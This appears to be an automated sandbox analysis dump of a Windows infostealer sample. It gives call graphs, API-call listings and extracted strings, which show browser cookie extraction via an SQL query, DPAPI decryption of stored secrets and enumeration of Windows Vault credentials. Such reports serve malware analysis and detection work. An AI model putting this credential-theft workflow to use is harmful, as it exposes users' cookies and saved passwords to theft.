83db1 lstrlen 27953 83db9 27952->27953 27954 83ddc 27952->27954 27987 81798 lstrlen 27953->27987 27955 81011 3 API calls 27954->27955 27955->27944 27957 83dc8 27988 81798 lstrlen 27957->27988 27958 83d2b lstrlen 27961 83d35 lstrlen 27958->27961 27958->27964 27960 83dd2 27989 81798 lstrlen 27960->27989 27961->27964 27964->27949 27964->27950 27964->27958 27984 81000 GetProcessHeap RtlAllocateHeap 27964->27984 27985 a02ec 84 API calls 27964->27985 27966 83d46 wsprintfA lstrlen 27967 83d71 27966->27967 27968 83d83 lstrcat 27966->27968 27967->27968 27969 81011 3 API calls 27968->27969 27969->27964 27970->27939 27991 d307c 27971->27991 27973 d4c01 27981 d4c44 27973->27981 28001 9c54d memset 27973->28001 27975 d4c18 28002 9c871 21 API calls 27975->28002 27977 d4c2a 28003 9c518 19 API calls 27977->28003 27979 d4c33 27979->27981 28004 d486f 79 API calls 27979->28004 27981->27943 27982->27947 27983->27964 27984->27966 27985->27964 27986->27952 27987->27957 27988->27960 27989->27954 27990->27941 27992 d3095 27991->27992 28000 d308e 27991->28000 27994 d30ad 27992->27994 28018 866ce 17 API calls 27992->28018 27995 d30ed memset 27994->27995 27994->28000 27996 d3108 27995->27996 27997 d3116 27996->27997 28019 8c59d 17 API calls 27996->28019 27997->28000 28005 86512 27997->28005 28000->27973 28001->27975 28002->27977 28003->27979 28004->27981 28020 8685c 28005->28020 28007 8651d 28007->28000 28008 86519 28008->28007 28009 8bfec GetSystemInfo 28008->28009 28023 865bd 28009->28023 28011 8c00e 28012 865bd 16 API calls 28011->28012 28013 8c01a 28012->28013 28014 865bd 16 API calls 28013->28014 28015 8c026 28014->28015 28016 865bd 16 API calls 28015->28016 28017 8c032 28016->28017 28017->28000 28018->27994 28019->27997 28021 d307c 17 API calls 28020->28021 28022 86861 28021->28022 28022->28008 28024 d307c 17 API calls 28023->28024 28025 865c2 28024->28025 28025->28011 28349 84440 24 API calls 28453 e9238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 28350 a6440 84 API calls 28455 85e5a 28 API calls 28175 8105d VirtualFree 28352 c7452 19 API calls 28458 b3e6b 20 API calls 28354 9f86a 31 API calls 28355 84c6d 17 API calls 28356 c2864 25 API calls 28358 d507d 24 API calls 28361 9807c 23 API calls 28462 a0670 _allmul _allmul _allmul _alldvrm 28367 c348f 27 API calls 28465 90284 26 API calls 28094 83098 28095 81b6a 2 API calls 28094->28095 28097 830af 28095->28097 28096 833a9 28097->28096 28118 81000 GetProcessHeap RtlAllocateHeap 28097->28118 28099 830ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28100 d4bec 79 API calls 28099->28100 28103 83126 28100->28103 28101 8339b DeleteFileW 28102 81011 3 API calls 28101->28102 28102->28096 28103->28101 28104 83392 28103->28104 28119 a02ec 84 API calls 28103->28119 28123 d3848 66 API calls 28104->28123 28107 83381 28122 9fb92 83 API calls 28107->28122 28109 8319c RtlCompareMemory 28110 832cd CryptUnprotectData 28109->28110 28117 83155 28109->28117 28110->28117 28112 831d0 RtlZeroMemory 28120 81000 GetProcessHeap RtlAllocateHeap 28112->28120 28114 81011 3 API calls 28114->28117 28115 81798 lstrlen 28115->28117 28116 81fa7 19 API calls 28116->28117 28117->28107 28117->28109 28117->28110 28117->28112 28117->28114 28117->28115 28117->28116 28121 a02ec 84 API calls 28117->28121 28118->28099 28119->28117 28120->28117 28121->28117 28122->28104 28123->28101 28467 96698 30 API calls 28370 c2c9e 95 API calls 28468 8629a 23 API calls 28471 a069d _allmul 28375 9b0aa 74 API calls 28474 856a2 _allrem 28035 824a4 28038 82198 RtlZeroMemory GetVersionExW 28035->28038 28039 821cb LoadLibraryW 28038->28039 28041 8249b 28039->28041 28042 821fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28039->28042 28043 82492 FreeLibrary 28042->28043 28048 82244 28042->28048 28043->28041 28044 8247b 28044->28043 28045 822e1 RtlCompareMemory 28045->28048 28046 82365 RtlCompareMemory 28046->28048 28047 81953 6 API calls 28047->28048 28048->28043 28048->28044 28048->28045 28048->28046 28048->28047 28049 81011 GetProcessHeap HeapFree VirtualQuery 28048->28049 28050 823f8 StrStrIW 28048->28050 28051 817c0 9 API calls 28048->28051 28049->28048 28050->28048 28051->28048 28055 82ea5 25 API calls 28089 89ea7 RtlAllocateHeap 28090 89ed9 28089->28090 28091 89ec1 28089->28091 28093 87f70 17 API calls 28091->28093 28093->28090 28376 9b8a6 80 API calls 28377 978b9 33 API calls 28475 a12bb _allmul _allmul _allmul _alldvrm _allmul 28378 a13ca 77 API calls 28477 a13ca 79 API calls 28478 896bc _alldiv _alldiv _alldiv _alldiv _allmul 28379 86eb7 24 API calls 28380 848b1 22 API calls 28381 82cb5 16 API calls 28481 afaca _allmul strcspn 28382 86eb7 22 API calls 28383 95cca 32 API calls 28385 d34ca 47 API calls 28387 85cc5 22 API calls 28486 ac6da 23 API calls 28388 b70de 24 API calls 27907 89ee8 27908 89f1a 27907->27908 27909 89ef1 HeapFree 27907->27909 27909->27908 27910 89f02 27909->27910 27912 87f70 17 API calls 27910->27912 27912->27908 28394 8f4ec 20 API calls 28395 828f8 100 API calls 28490 a13ca 78 API calls 28396 84cf5 memset 28491 b9ef6 104 API calls 28397 a13ca 79 API calls 27726 84108 27729 84045 27726->27729 27748 83fdc 27729->27748 27732 83fdc 50 API calls 27733 8407a 27732->27733 27734 83fdc 50 API calls 27733->27734 27735 8408d 27734->27735 27736 83fdc 50 API calls 27735->27736 27737 840a0 27736->27737 27738 83fdc 50 API calls 27737->27738 27739 840b3 27738->27739 27740 83fdc 50 API calls 27739->27740 27741 840c6 27740->27741 27742 83fdc 50 API calls 27741->27742 27743 840d9 27742->27743 27744 83fdc 50 API calls 27743->27744 27745 840ec 27744->27745 27746 83fdc 50 API calls 27745->27746 27747 840ff 27746->27747 27759 81afe 27748->27759 27751 8403f 27751->27732 27755 84038 27822 81011 27755->27822 27827 81000 GetProcessHeap RtlAllocateHeap 27759->27827 27761 81b0d SHGetFolderPathW 27762 81b20 27761->27762 27766 81b63 27761->27766 27763 81011 3 API calls 27762->27763 27764 81b28 27763->27764 27764->27766 27828 819e5 27764->27828 27766->27751 27767 8199d 27766->27767 27843 81953 27767->27843 27769 819a6 27770 81011 3 API calls 27769->27770 27771 819af 27770->27771 27772 83ed9 27771->27772 27773 83eed 27772->27773 27774 83fd1 27772->27774 27773->27774 27849 81000 GetProcessHeap RtlAllocateHeap 27773->27849 27774->27755 27794 81d4a 27774->27794 27776 83f01 PathCombineW FindFirstFileW 27777 83fca 27776->27777 27778 83f27 27776->27778 27781 81011 3 API calls 27777->27781 27779 83f78 lstrcmpiW 27778->27779 27780 83f32 lstrcmpiW 27778->27780 27850 81000 GetProcessHeap RtlAllocateHeap 27778->27850 27779->27778 27782 83faf FindNextFileW 27779->27782 27780->27782 27783 83f42 lstrcmpiW 27780->27783 27781->27774 27782->27778 27784 83fc3 FindClose 27782->27784 27783->27782 27785 83f56 27783->27785 27784->27777 27867 81000 GetProcessHeap RtlAllocateHeap 27785->27867 27788 83f92 PathCombineW 27851 83e04 27788->27851 27789 83f60 PathCombineW 27791 83ed9 23 API calls 27789->27791 27792 83f76 27791->27792 27793 81011 3 API calls 27792->27793 27793->27782 27795 81d62 27794->27795 27796 81eb4 27794->27796 27795->27796 27900 819b4 27795->27900 27796->27755 27799 81d79 27801 81953 6 API calls 27799->27801 27800 81d8b 27802 81953 6 API calls 27800->27802 27803 81d83 27801->27803 27802->27803 27803->27796 27804 81da3 FindFirstFileW 27803->27804 27805 81ead 27804->27805 27811 81dba 27804->27811 27806 81011 3 API calls 27805->27806 27806->27796 27807 81dc5 lstrcmpiW 27809 81ddd lstrcmpiW 27807->27809 27810 81e8e FindNextFileW 27807->27810 27808 81953 6 API calls 27808->27811 27809->27810 27819 81df5 27809->27819 27810->27811 27812 81ea2 FindClose 27810->27812 27811->27807 27811->27808 27813 8199d 9 API calls 27811->27813 27812->27805 27815 81e54 lstrcmpiW 27813->27815 27814 819b4 lstrlenW 27814->27819 27815->27819 27817 81011 3 API calls 27817->27810 27818 81953 6 API calls 27818->27819 27819->27814 27819->27817 27819->27818 27820 8199d 9 API calls 27819->27820 27821 81d4a 12 API calls 27819->27821 27904 81cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27819->27904 27820->27819 27821->27819 27905 81162 VirtualQuery 27822->27905 27825 8102d 27825->27751 27826 8101d GetProcessHeap HeapFree 27826->27825 27827->27761 27829 819fa RegOpenKeyExW 27828->27829 27830 819f7 27828->27830 27831 81a28 RegQueryValueExW 27829->27831 27832 81aa2 27829->27832 27830->27829 27834 81a94 RegCloseKey 27831->27834 27835 81a46 27831->27835 27833 81ab9 27832->27833 27836 819e5 5 API calls 27832->27836 27833->27764 27834->27832 27834->27833 27835->27834 27842 81000 GetProcessHeap RtlAllocateHeap 27835->27842 27836->27833 27838 81a61 RegQueryValueExW 27839 81a8b 27838->27839 27840 81a7f 27838->27840 27841 81011 3 API calls 27839->27841 27840->27834 27841->27840 27842->27838 27844 81964 lstrlenW lstrlenW 27843->27844 27848 81000 GetProcessHeap RtlAllocateHeap 27844->27848 27847 81986 lstrcatW lstrcatW 27847->27769 27848->27847 27849->27776 27850->27788 27868 81b6a 27851->27868 27853 83e0f 27857 83ec7 27853->27857 27874 81c31 CreateFileW 27853->27874 27857->27792 27861 83ebf 27862 81011 3 API calls 27861->27862 27862->27857 27863 83ea8 27866 81011 3 API calls 27863->27866 27864 83e6c RtlCompareMemory 27864->27863 27865 83e7e CryptUnprotectData 27864->27865 27865->27863 27866->27861 27867->27789 27869 81b99 27868->27869 27870 81b6f 27868->27870 27869->27853 27870->27869 27871 81b76 CreateFileW 27870->27871 27872 81b8d CloseHandle 27871->27872 27873 81b95 27871->27873 27872->27873 27873->27853 27875 81c98 27874->27875 27876 81c53 GetFileSize 27874->27876 27875->27857 27885 82fb1 27875->27885 27877 81c90 CloseHandle 27876->27877 27878 81c63 27876->27878 27877->27875 27897 81000 GetProcessHeap RtlAllocateHeap 27878->27897 27880 81c6b ReadFile 27881 81c80 27880->27881 27882 81c87 27880->27882 27881->27877 27881->27882 27883 81011 3 API calls 27882->27883 27884 81c8e 27883->27884 27884->27877 27886 82fb8 StrStrIA 27885->27886 27887 82ff2 27885->27887 27886->27887 27888 82fcd lstrlen StrStrIA 27886->27888 27887->27857 27891 8123b lstrlen 27887->27891 27888->27887 27889 82fe7 27888->27889 27898 8190b 6 API calls 27889->27898 27892 8129b 27891->27892 27893 81256 CryptStringToBinaryA 27891->27893 27892->27861 27892->27863 27892->27864 27893->27892 27894 81272 27893->27894 27899 81000 GetProcessHeap RtlAllocateHeap 27894->27899 27896 8127e CryptStringToBinaryA 27896->27892 27897->27880 27898->27887 27899->27896 27901 819bc 27900->27901 27903 819d4 27900->27903 27902 819c3 lstrlenW 27901->27902 27901->27903 27902->27903 27903->27799 27903->27800 27904->27819 27906 81019 27905->27906 27906->27825 27906->27826 28493 a5f08 92 API calls 28026 e9304 28028 e9344 28026->28028 28027 e9584 28027->28027 28028->28027 28029 e94da LoadLibraryA 28028->28029 28033 e951f VirtualProtect VirtualProtect 28028->28033 28030 e94f1 28029->28030 28030->28028 28032 e9503 GetProcAddress 28030->28032 28032->28030 28034 e9519 28032->28034 28033->28027 28496 b6f06 24 API calls 28170 8411b 28171 84045 50 API calls 28170->28171 28172 8412b 28171->28172 28173 84045 50 API calls 28172->28173 28174 8413b 28173->28174 28399 984a7 30 API calls 28400 d4116 30 API calls 28499 82b15 50 API calls 28500 a6b14 memset memcpy _allmul 28263 83717 28264 81b6a 2 API calls 28263->28264 28267 8372e 28264->28267 28265 83c23 28267->28265 28313 81000 GetProcessHeap RtlAllocateHeap 28267->28313 28268 8376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28269 837a8 28268->28269 28270 8379e 28268->28270 28272 d4bec 79 API calls 28269->28272 28314 8349b 31 API calls 28270->28314 28275 837b3 28272->28275 28273 83c15 DeleteFileW 28274 81011 3 API calls 28273->28274 28274->28265 28275->28273 28276 83c0c 28275->28276 28315 81000 GetProcessHeap RtlAllocateHeap 28275->28315 28325 d3848 66 API calls 28276->28325 28279 837e3 28316 a02ec 84 API calls 28279->28316 28281 83bcc 28321 9fb92 83 API calls 28281->28321 28283 83bd9 lstrlen 28284 83c05 28283->28284 28285 83be5 28283->28285 28287 81011 3 API calls 28284->28287 28322 81798 lstrlen 28285->28322 28287->28276 28288 83bf3 28323 81798 lstrlen 28288->28323 28289 83833 RtlCompareMemory 28290 83a37 CryptUnprotectData 28289->28290 28307 837ee 28289->28307 28290->28307 28293 83bfc 28324 81798 lstrlen 28293->28324 28295 83867 RtlZeroMemory 28317 81000 GetProcessHeap RtlAllocateHeap 28295->28317 28297 81011 3 API calls 28297->28307 28298 83b0f lstrlen 28299 83b21 lstrlen 28298->28299 28298->28307 28299->28307 28300 81000 GetProcessHeap RtlAllocateHeap 28300->28307 28301 81fa7 19 API calls 28301->28307 28302 83987 lstrlen 28305 83999 lstrlen 28302->28305 28302->28307 28304 83b66 wsprintfA lstrlen 28306 83ba3 lstrcat 28304->28306 28304->28307 28305->28307 28306->28307 28307->28281 28307->28289 28307->28290 28307->28295 28307->28297 28307->28298 28307->28300 28307->28301 28307->28302 28307->28306 28318 82112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28307->28318 28319 82112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28307->28319 28320 a02ec 84 API calls 28307->28320 28309 839de wsprintfA lstrlen 28310 83a1b lstrcat 28309->28310 28311 83a0d 28309->28311 28312 81011 3 API calls 28310->28312 28311->28310 28312->28307 28313->28268 28314->28269 28315->28279 28316->28307 28317->28307 28318->28309 28319->28304 28320->28307 28321->28283 28322->28288 28323->28293 28324->28284 28325->28273 28402 90128 23 API calls 28501 8cb2a _allmul _allmul 28502 b072d 19 API calls 28405 89925 18 API calls 28504 cc322 27 API calls 28508 97b3d 18 API calls 28254 8413e 28255 84045 50 API calls 28254->28255 28256 8414e 28255->28256 28510 90f3e 50 API calls 28407 af130 22 API calls 28511 9ff32 21 API calls 28408 99534 39 API calls 28512 9f74d 18 API calls 28513 a6340 82 API calls 28409 ae141 18 API calls 28411 8a558 18 API calls 28412 ae558 22 API calls 28517 8ab68 20 API calls 28413 b5d6f 20 API calls 28414 9a16f 33 API calls 28518 b7762 memset memset memcpy 28520 a7f67 24 API calls 28416 9c97b memcpy 28326 82f77 28327 82e30 22 API calls 28326->28327 28328 82f9a 28327->28328 28329 82e30 22 API calls 28328->28329 28330 82fab 28329->28330 28419 a7d8b _allrem memcpy 28523 9ab8b 19 API calls 28420 81198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 28526 8bf9a _alldiv 28527 81b9d GetFileAttributesW 28528 9cb91 18 API calls 28422 9fd97 19 API calls 28529 a13ca 78 API calls 28531 c53ad memset memcpy memset memcpy 28424 911a0 33 API calls 28532 a8ba6 7 API calls 28425 a9dbc 25 API calls 28533 a13ca 79 API calls 28534 c33b7 27 API calls 27913 89fc8 27914 89fd3 27913->27914 27916 89fd8 27913->27916 27915 89ff4 HeapCreate 27915->27914 27917 8a004 27915->27917 27916->27914 27916->27915 27919 87f70 17 API calls 27917->27919 27919->27914 28537 a13ca 79 API calls 28427 d3dc8 24 API calls 28540 b73c4 22 API calls 28124 843d9 28131 84317 _alloca_probe RegOpenKeyW 28124->28131 28127 84317 25 API calls 28128 843f5 28127->28128 28129 84317 25 API calls 28128->28129 28130 84403 28129->28130 28132 843cf 28131->28132 28133 84343 RegEnumKeyExW 28131->28133 28132->28127 28134 843c4 RegCloseKey 28133->28134 28138 8436d 28133->28138 28134->28132 28135 81953 6 API calls 28135->28138 28136 8199d 9 API calls 28136->28138 28138->28135 28138->28136 28139 81011 3 API calls 28138->28139 28142 8418a 28138->28142 28140 8439b RegEnumKeyExW 28139->28140 28140->28138 28141 843c3 28140->28141 28141->28134 28144 8430d 28142->28144 28151 841a3 28142->28151 28143 819e5 9 API calls 28143->28151 28144->28138 28146 84205 wsprintfW 28147 81011 3 API calls 28146->28147 28147->28151 28149 81011 GetProcessHeap HeapFree VirtualQuery 28149->28151 28150 817c0 9 API calls 28150->28151 28151->28143 28151->28144 28151->28149 28151->28150 28152 81000 GetProcessHeap RtlAllocateHeap 28151->28152 28153 81fce GetProcessHeap HeapFree VirtualQuery CryptUnprotectData RtlMoveMemory 28151->28153 28152->28146 28153->28151 28541 8ebd9 24 API calls 28176 815dd 28177 81600 28176->28177 28178 815f3 lstrlen 28176->28178 28187 81000 GetProcessHeap RtlAllocateHeap 28177->28187 28178->28177 28180 81608 lstrcat 28181 8163d lstrcat 28180->28181 28182 81644 28180->28182 28181->28182 28188 81333 28182->28188 28185 81011 3 API calls 28186 81667 28185->28186 28187->28180 28211 81000 GetProcessHeap RtlAllocateHeap 28188->28211 28190 81357 28212 8106c lstrlen MultiByteToWideChar 28190->28212 28192 81366 28213 812a3 RtlZeroMemory 28192->28213 28195 813b8 RtlZeroMemory 28198 813ed 28195->28198 28196 815b5 28197 81011 3 API calls 28196->28197 28199 815d2 28197->28199 28198->28196 28215 81000 GetProcessHeap RtlAllocateHeap 28198->28215 28199->28185 28201 814a7 wsprintfW 28203 814c9 28201->28203 28202 815a1 28204 81011 3 API calls 28202->28204 28203->28202 28216 81000 GetProcessHeap RtlAllocateHeap 28203->28216 28204->28196 28206 8159a 28208 81011 3 API calls 28206->28208 28207 81533 28207->28206 28217 8104c VirtualAlloc 28207->28217 28208->28202 28210 8158a RtlMoveMemory 28210->28206 28211->28190 28212->28192 28214 812c5 28213->28214 28214->28195 28214->28196 28215->28201 28216->28207 28217->28210 28218 863dd 28221 8b87b 28218->28221 28219 863f4 28222 8b88d memset 28221->28222 28228 8b8e5 28222->28228 28226 8ba3c 28226->28219 28228->28222 28228->28226 28230 8ba14 28228->28230 28231 8ba41 28228->28231 28236 8b609 28228->28236 28239 8b828 28228->28239 28243 8b64b 18 API calls 28228->28243 28244 8bb9f 18 API calls 28228->28244 28245 8a2aa 17 API calls 28228->28245 28246 8a1c6 18 API calls 28230->28246 28248 d52ae _allmul 28231->28248 28233 8ba32 28247 d4db2 17 API calls 28233->28247 28249 8a08a 28236->28249 28238 8b60f 28238->28228 28240 8b842 GetFileAttributesExW 28239->28240 28241 8b861 28240->28241 28242 8b852 28240->28242 28241->28228 28242->28240 28242->28241 28243->28228 28244->28228 28245->28228 28246->28233 28247->28226 28248->28226 28250 8a0a4 28249->28250 28252 8a0aa 28250->28252 28253 86a81 memset 28250->28253 28252->28238 28253->28252 28430 8c9ea _allmul _alldiv 28432 d55eb IsProcessorFeaturePresent 28434 899e1 strncmp 28435 8b1e3 23 API calls 28542 a7be1 29 API calls 28154 847fa 28161 8479c 28154->28161 28157 8479c 23 API calls 28158 84813 28157->28158 28159 8479c 23 API calls 28158->28159 28160 8481f 28159->28160 28162 81afe 10 API calls 28161->28162 28163 847af 28162->28163 28164 847f1 28163->28164 28165 8199d 9 API calls 28163->28165 28164->28157 28167 847bf 28165->28167 28166 847ea 28168 81011 3 API calls 28166->28168 28167->28166 28169 81d4a 18 API calls 28167->28169 28168->28164 28169->28167 28437 849f1 13 API calls 28546 a13ca 62 API calls 28547 99ff0 32 API calls 28438 8d1f7 memset _allmul _allmul

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 83717-83730 call 81b6a 3 83736-8374c 0->3 4 83c37-83c3d 0->4 5 8374e-83757 call 8302d 3->5 6 83762-8379c call 81000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 3->6 10 8375c-8375e 5->10 11 837a8-837b5 call d4bec 6->11 12 8379e-837a3 call 8349b 6->12 10->6 16 837bb-837d3 call beeb8 11->16 17 83c15-83c1e DeleteFileW call 81011 11->17 12->11 22 837d9-837f1 call 81000 call a02ec 16->22 23 83c0c-83c10 call d3848 16->23 21 83c23-83c28 17->21 21->4 24 83c2a-83c32 call 82ffa 21->24 31 83bd0-83be3 call 9fb92 lstrlen 22->31 32 837f7 22->32 23->17 24->4 37 83c05-83c07 call 81011 31->37 38 83be5-83c00 call 81798 * 3 31->38 33 837fc-83816 call 81fa7 32->33 41 8381c-8382d 33->41 42 83bb6-83bc6 call a02ec 33->42 37->23 38->37 45 83833-83843 RtlCompareMemory 41->45 46 83a37-83a51 CryptUnprotectData 41->46 42->33 55 83bcc 42->55 45->46 50 83849-8384b 45->50 46->42 48 83a57-83a5c 46->48 48->42 52 83a62-83a78 call 81fa7 48->52 50->46 54 83851-83856 50->54 61 83a7a-83a80 52->61 62 83a86-83a9d call 81fa7 52->62 54->46 58 8385c-83861 54->58 55->31 58->46 60 83867-838ed RtlZeroMemory call 81000 58->60 73 83a2e-83a32 60->73 74 838f3-83909 call 81fa7 60->74 61->62 64 83a82 61->64 68 83aab-83ac2 call 81fa7 62->68 69 83a9f-83aa5 62->69 64->62 78 83ad0-83aed call 81fa7 68->78 79 83ac4-83aca 68->79 69->68 71 83aa7 69->71 71->68 75 83bb1 call 81011 73->75 83 8390b-83911 74->83 84 83917-8392d call 81fa7 74->84 75->42 90 83aef-83af1 78->90 91 83af7-83b01 78->91 79->78 82 83acc 79->82 82->78 83->84 86 83913 83->86 92 8393b-83952 call 81fa7 84->92 93 8392f-83935 84->93 86->84 90->91 94 83af3 90->94 95 83b0f-83b1b lstrlen 91->95 96 83b03-83b05 91->96 103 83960-83979 call 81fa7 92->103 104 83954-8395a 92->104 93->92 97 83937 93->97 94->91 95->42 100 83b21-83b2a lstrlen 95->100 96->95 99 83b07-83b0b 96->99 97->92 99->95 100->42 102 83b30-83b4f call 81000 100->102 110 83b59-83b93 call 82112 wsprintfA lstrlen 102->110 111 83b51 102->111 112 8397b-83981 103->112 113 83987-83993 lstrlen 103->113 104->103 106 8395c 104->106 106->103 118 83ba3-83baf lstrcat 110->118 119 83b95-83ba1 call 8102f 110->119 111->110 112->113 115 83983 112->115 113->73 117 83999-839a2 lstrlen 113->117 115->113 117->73 120 839a8-839c7 call 81000 117->120 118->75 119->118 125 839c9 120->125 126 839d1-83a0b call 82112 wsprintfA lstrlen 120->126 125->126 129 83a1b-83a29 lstrcat call 81011 126->129 130 83a0d-83a19 call 8102f 126->130 129->73 130->129
                                    APIs
                                      • Part of subcall function 00081B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00081B82
                                      • Part of subcall function 00081B6A: CloseHandle.KERNEL32(00000000), ref: 00081B8F
                                    • GetTempPathW.KERNEL32(00000104,00000000), ref: 00083778
                                    • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00083782
                                    • DeleteFileW.KERNELBASE(00000000), ref: 00083789
                                    • CopyFileW.KERNEL32(?,00000000,00000000), ref: 00083794
                                    • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 0008383B
                                    • RtlZeroMemory.NTDLL(?,00000040), ref: 00083870
                                    • lstrlen.KERNEL32(?,?,?,?,?), ref: 0008398B
                                    • lstrlen.KERNEL32(00000000), ref: 0008399A
                                    • wsprintfA.USER32 ref: 000839F1
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 000839FD
                                    • lstrcat.KERNEL32(00000000,?), ref: 00083A21
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00083A49
                                    • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00083B13
                                    • lstrlen.KERNEL32(00000000), ref: 00083B22
                                    • wsprintfA.USER32 ref: 00083B79
                                    • lstrlen.KERNEL32(00000000), ref: 00083B85
                                    • lstrcat.KERNEL32(00000000,?), ref: 00083BA9
                                    • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00083BDA
                                    • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00083C16
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                    • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                    • API String ID: 584740257-404540950
                                    • Opcode ID: db6ce6ab68a3e9764131aac09ebcdc44c456b69e7b9ac3fe299efac07930bcfc
                                    • Instruction ID: 670c89e043a30e7cd80d5367027ab5f5eb9d687dfe2f4516304c8600e554ace9
                                    • Opcode Fuzzy Hash: db6ce6ab68a3e9764131aac09ebcdc44c456b69e7b9ac3fe299efac07930bcfc
                                    • Instruction Fuzzy Hash: 1DE19B70209341AFE715EF24C884AAFBBE9BFC5B44F04482DF9C586252DB79C905CB62

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 134 82198-821c9 RtlZeroMemory GetVersionExW 135 821cb-821d0 134->135 136 821d7-821dc 134->136 137 821de 135->137 138 821d2 135->138 136->137 139 821e3-821f6 LoadLibraryW 136->139 137->139 138->136 140 8249b-824a3 139->140 141 821fc-8223e GetProcAddress * 5 139->141 142 82492-8249a FreeLibrary 141->142 143 82244-8224a 141->143 142->140 143->142 144 82250-82252 143->144 144->142 145 82258-8225a 144->145 145->142 146 82260-82265 145->146 146->142 147 8226b-82277 146->147 148 8227e-82280 147->148 148->142 149 82286-822a5 148->149 151 8248b-8248f 149->151 152 822ab-822b3 149->152 151->142 153 822b9-822c5 152->153 154 82483 152->154 155 822c9-822db 153->155 154->151 156 822e1-822f1 RtlCompareMemory 155->156 157 82365-82375 RtlCompareMemory 155->157 159 82452-82475 156->159 160 822f7-82348 call 81953 * 3 156->160 158 8237b-823c9 call 81953 * 3 157->158 157->159 176 823cb-823dc call 81953 158->176 177 823e4-823ea 158->177 159->155 161 8247b-8247f 159->161 160->177 178 8234e-82363 call 81953 160->178 161->154 190 823e0 176->190 181 823ec-823ee 177->181 182 82431-82433 177->182 178->190 187 8242a-8242c call 81011 181->187 188 823f0-823f2 181->188 184 8243c-8243e 182->184 185 82435-82437 call 81011 182->185 192 82440-82442 call 81011 184->192 193 82447-82449 184->193 185->184 187->182 188->187 194 823f4-823f6 188->194 190->177 192->193 193->159 197 8244b-8244d call 81011 193->197 194->187 196 823f8-82406 StrStrIW 194->196 198 82408-82421 call 817c0 * 3 196->198 199 82426 196->199 197->159 198->199 199->187
                                    APIs
                                    • RtlZeroMemory.NTDLL(?,00000114), ref: 000821AF
                                    • GetVersionExW.KERNEL32(?), ref: 000821BE
                                    • LoadLibraryW.KERNEL32(vaultcli.dll), ref: 000821E8
                                    • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0008220A
                                    • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 00082214
                                    • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00082220
                                    • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0008222A
                                    • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00082236
                                    • RtlCompareMemory.NTDLL(?,000E1110,00000010), ref: 000822E8
                                    • RtlCompareMemory.NTDLL(?,000E1110,00000010), ref: 0008236C
                                      • Part of subcall function 00081953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
                                      • Part of subcall function 00081953: lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
                                      • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,?), ref: 00081990
                                      • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994
                                    • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 000823FE
                                    • FreeLibrary.KERNELBASE(00000000), ref: 00082493
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                    • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                    • API String ID: 2583887280-2831467701
                                    • Opcode ID: 2c67f8b11e6fd3aab0010db11284c43f56d8013b8eb1cf378e18b5c8592d3f89
                                    • Instruction ID: 98d066dbc322e4484caac54a837068d24d4d34c7b6dd7bdaef90f102b542e3a8
                                    • Opcode Fuzzy Hash: 2c67f8b11e6fd3aab0010db11284c43f56d8013b8eb1cf378e18b5c8592d3f89
                                    • Instruction Fuzzy Hash: 5A918B71A083009FD754EF65C884AAFBBEABF98704F00482EF9C597251EB75D941CB62

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
